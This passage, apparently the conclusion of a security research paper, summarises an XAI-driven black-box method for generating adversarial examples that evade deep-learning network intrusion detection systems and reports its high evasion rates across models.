We had previously proposed XAI-driven white-box adversarial attacks on DL-based NIDS and showed their effectiveness in [34]. In this paper, we improved this method by evolving them from a white-box approach to a black-box approach. Subsequently, we implemented our proposed black-box approach and evaluated it across different NIDS models to confirm its generalizability. As a result, our proposed method achieved a high evasion rate (minimum: 95.7%, maximum: 100%) without requiring internal information about the targeted NIDS and regardless of NIDS models and attack scenarios. Based on these results, we conclude that our proposed method can generate highly evasive and practical AEs, contributing to the assessment and advancement of DL-based NIDS.